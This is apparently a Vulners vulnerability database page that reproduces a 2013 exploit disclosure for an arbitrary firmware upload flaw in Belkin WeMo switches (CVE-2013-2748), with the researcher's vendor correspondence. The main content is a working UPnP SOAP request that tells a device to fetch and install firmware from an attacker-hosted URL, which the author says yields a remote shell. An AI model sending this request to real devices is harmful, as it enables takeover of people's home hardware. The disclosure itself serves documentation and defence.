Vulners
Lucene search
Belkin Wemo - Arbitrary Firmware Upload Vulnerability
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2013-2748 | 28 Jan 202019:49 | – | cve |
 | CVE-2013-2748 | 28 Jan 202019:49 | – | cvelist |
 | Belkin Wemo - Arbitrary Firmware Upload | 8 Apr 201300:00 | – | exploitdb |
 | Belkin Wemo - Arbitrary Firmware Upload | 8 Apr 201300:00 | – | exploitpack |
 | CVE-2013-2748 | 28 Jan 202020:15 | – | nvd |
 | Belkin Wemo Arbitrary Firmware Upload | 7 Apr 201300:00 | – | packetstorm |
 | Information disclosure | 28 Jan 202020:15 | – | prion |
 | Belkin Wemo - Arbitrary Firmware Upload | 1 Jul 201400:00 | – | seebug |
# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748
Hello
Im independently working with Mitre and Belkin on this matter so please
disregard my naiveness. Several months ago I discovered a vulnerablility on
the Belkin WeMo light switch would allow arbitrary firmware to uploaded
resulting in remote shell access.
Here is a youtube link to a PoC video I made:
https://www.youtube.com/watch?v=BcW2q0aHOFo
I was finally able to reach Belkin and worked with them on patching the
vulnerability. I recently heard back from them and here is the
correspondence:
Daniel,
The FW for WeMo Switch and Sensor with the security fixes for some of the
issues you notified us about have shipped. The updated FW version is
WeMo_US_2.00.2176.PVT and WeMo_WW_2.00.2176.PVT (worldwide version). I
didn't register for CVE's for the vulns you found, as the process wasn't
clear for companies outside tier 1 (Microsoft, Oracle, Apple, Adobe) type
companies. We are still working on a credit page for White Hat submissions
and it will probably be a few months out.
I reached out to Mitre and they assigned me a CVE and recommended I submit
my code here. Here is the code which would allow someone to upload their
own firmware:
POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length:
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent:
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:UpdateFirmware xmlns:u="urn:Belkin:service:firmwareupdate:1">
<ReleaseDate>07Jan2013</ReleaseDate><NewFirmwareVersion>1</NewFirmwareVersion><URL>
http://10.0.1.99/bad_firmware.bin<http://10.0.1.99/WeMo_US_2.00.1821.PVT_SNS.bin.gpg%3C/URL%3E%3CSignature%3Ea053469a3efe2bd5e396104ac1ef5b0e%3C/Signature%3E>
</u:UpdateFirmware>
</s:Body>
</s:Envelope>
Mitre needs the vulnerability documented on an external site in order to
add the entry into the CVE database. If needed I can forward you the PGP
signed message from them. If you need anything else feel free to ask. I
have copies of all correspondence between Belkin., Mitre, and myself.
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2013 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.43777